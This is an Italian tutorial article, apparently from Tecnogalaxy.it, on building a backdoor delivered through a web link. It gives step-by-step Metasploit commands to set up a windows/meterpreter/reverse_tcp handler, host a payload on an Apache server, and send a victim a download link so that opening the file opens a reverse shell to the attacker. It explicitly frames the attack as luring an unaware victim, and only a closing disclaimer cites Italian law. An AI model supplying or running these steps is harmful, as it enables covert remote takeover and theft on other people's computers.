In questo articolo andremo a parlare dei procedimenti necessari per creare una backdoor attivabile attraverso indirizzo web; ciò significa che il file contenente la backdoor possiamo scaricarlo su qualsiasi computer mediante un link. È una delle trovate più “furbe” utilizzate dagli hacker per accedere a sistemi informatici remoti; infatti basterà che la vittima “abbocchi” cliccando sul link e di li a poco scaricherà inconsapevolmente la nostra backdoor; una volta fatto ciò potremo svolgere molte azioni sul suo PC, senza che se ne accorga. Ecco perché quando viaggiamo in rete dobbiamo fare attenzione su quello che clicchiamo; basta poco per ritrovarsi sui nostri computer una bella backdoor creata da chissà chi e chissà con quale intenzione; al massimo ve la scampate con il vostro antivirus (sperando che sia efficiente), altrimenti vi arrangiate; alla fine, quindi, è meglio prevenire che curare, prestando maggior attenzione ai contenuti sui quali cliccate…e magari, gia che ci siete, assicuratevi che il vostro antivirus non sia uno di quei programmini che di utile hanno ben poco. Dunque, ora entriamo nel dettaglio della questione.

Per prima cosa richiamiamo la msfconsole di Metasploit Framework.

Creare una backdoor attivabile attraverso indirizzo web

Una volta startata procediamo ordinatamente con i seguenti comandi:

-use exploit/multi/handler

Creare una backdoor attivabile attraverso indirizzo web

-set payload windows/meterpreter/reverse_tcp

Creare una backdoor attivabile attraverso indirizzo web

-set LHOST “nostro indirizzo IP”

Creare una backdoor attivabile attraverso indirizzo web

N.B: Per ricavare il nostro indirizzo IP basterà aprire un nuovo terminale e digitare il comando “ifconfig”.

Creare una backdoor attivabile attraverso indirizzo web

-set LPORT “nostra porta locale”

Creare una backdoor attivabile attraverso indirizzo web

N.B: Potete scegliere una qualsiasi porta locale; potete ricavarla aprendo un nuovo terminale digitando il comando “nmap [nostro indirizzo IP]”, dove al posto di “[nostro indirizzo IP]” inserirete il vostro IP locale, ottenibile, come sempre, con il comando “ifconfig”. Tuttavia io vi consiglio l’utilizzo della porta 443.

-exploit

Creare una backdoor attivabile attraverso indirizzo web

Adesso trasferiamo nel percorso computer>var>www>html il payload che abbiamo scelto per l’attacco.

Creare una backdoor attivabile attraverso indirizzo web

Possiamo trovare una vasta gamma di payload nel percorso computer>usr>share>set>src; io per esempio ho scelto il payload “shellcodeexec.binary”.

Creare una backdoor attivabile attraverso indirizzo web

A questo punto apriamo un nuovo terminale e digitiamo il comando “service apache2 start”.

Creare una backdoor attivabile attraverso indirizzo web

Infine creiamo un link da inviare alla vittima, con la seguente struttura:

“[nostro indirizzo IP]/nome del payload scelto”

Creare una backdoor attivabile attraverso indirizzo webCreare una backdoor attivabile attraverso indirizzo

In questo modo si avvierà il download e una volta che il file verrà aperto si creerà il ponte di comunicazione tra il terminale di Metasploit Framwork in ascolto e il PC della vittima.

Creare una backdoor attivabile attraverso indirizzo web

Se volete maggiori dettagli basterà digitare il comando “help” sul terminale di Metasploit in ascolto.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Leggi anche il nostro articolo Creare link backdoor.

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.